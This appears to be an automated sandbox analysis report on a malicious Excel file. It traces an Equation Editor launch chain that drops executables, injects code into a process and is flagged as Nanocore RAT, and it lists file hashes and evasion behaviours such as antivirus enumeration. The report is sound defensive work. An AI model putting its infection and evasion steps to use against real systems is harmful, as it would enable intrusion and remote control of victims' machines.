Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Thread delayed: delay time: 922337203685477

Source: sys30.exe, 00000007.00000002.698161367.0000000006149000.00000004.00000001.sdmp	Binary or memory string: VMware_S
Source: sys30.exe, 00000007.00000002.685487329.000000000061D000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process token adjusted: Debug

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe

Memory written: C:\Users\user\AppData\Local\sys4h57g\sys30.exe base: 70000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'

Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: sys30.exe, 00000007.00000002.688965691.00000000012D0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe

Code function: 9_2_0062C010 GetSystemTimes,

9_2_0062C010

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	WMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Source: sys30.exe, 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp

String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.692921924.0000000003719000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTR

ID:	483371
Product:	CloudBasic
Start time:	21:46:57
Start date:	14.09.2021
Sample:	Enclosed.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	307b2db43e9e3b04e429cdd9d7df08ad
SHA1:	58a8d2e79a4984c457f779c34e6a3147a2a66d3f
SHA256:	d902487a332eb4be203d196abe75aa72b2fed223df29fb3112aa27e5b54109df
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4C658DB84A58CE7EC0C2F2EB9F14C97C	CE119BDEE8F67E1AEF1E45DA57C0BF2E858D3826	3BEE3F04F56446103684FC76026CFAA5AB39CF206489B2E7C9142EAD5A68C738
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E09461.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	B13F5C457D230231A208F2987E745125	8F04183D640FD9B079F744C7D5516B2306510460	61871A444B8C92B591A7DDC6C56513F3AFAFAF66B8415F0302E875F7712048AE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398B5F3D.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A50C9D9.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63AD3153.png	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced	E2267BEF7933F02C009EAEFC464EB83D	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\661AB804.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BFFAE51.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EBE50B2.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACB7B606.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE70A24F.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0FB241A.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C533050B.png	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced	E2267BEF7933F02C009EAEFC464EB83D	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD10F035.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D159201E.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5ACA390.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D7CE92C.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E28D9338.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E63617.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FAFF2EEE.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	36605E4B4C07FDB5E0D5AB38D34D867C	34E0F81DD7F7AA05EBC4C7BD124057242D48995A	67E8E1A18EDD19C46C49819B16A81C208321D1A04C280EBA39A785F6B011742D
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5360.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5361.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5391.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF90E.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF90F.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF93F.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Temp\sys30s.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	0E362E7005823D0BEC3719B902ED6D62	590D860B909804349E0CDC2F1662B37BD62F7463	2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
C:\Users\user\AppData\Local\Temp\sys30s.txt	ASCII text, with CRLF line terminators	048C93039215AAD06E6156149E44C4A0	E176C7B09B521EE34DB52FADCB6B7C4F3E22F32A	0E3A14D7B7309BA366364A3FE0DB2C99AE3ADB937A1E50EBD2FCFD5E1A286D89
C:\Users\user\AppData\Local\sys4h57g\sys30.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	4C658DB84A58CE7EC0C2F2EB9F14C97C	CE119BDEE8F67E1AEF1E45DA57C0BF2E858D3826	3BEE3F04F56446103684FC76026CFAA5AB39CF206489B2E7C9142EAD5A68C738
C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat	data	881D2F4B245BF6C5FC7A6CA720D59D5E	4BFC165F42F888943ED858A289D0B7368986AA8A	79655C30BBE54988E098C7759D7614CB980AAAB2FBB60E7F8937CA8F9C95420F
C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat	data	DD0A8CB117CFA0CA68879D97851EEEF8	4A7CA94C927C6948C0E0B7940E89EBE8A9E90652	951EF69376D55EFF9C49CA7D171A5089A00B87587BB344BBE01207C9D16E27D6
C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bak	data	ACD3FB4310417DC77FE06F15B0E353E6	80E7002E655EB5765FDEB21114295CB96AD9D5EB	DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bin	data	BB0F9B9992809E733EFFF8B0E562CFD6	F0BAB3CF73A04F5A689E6AFC764FEE9276992742	C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
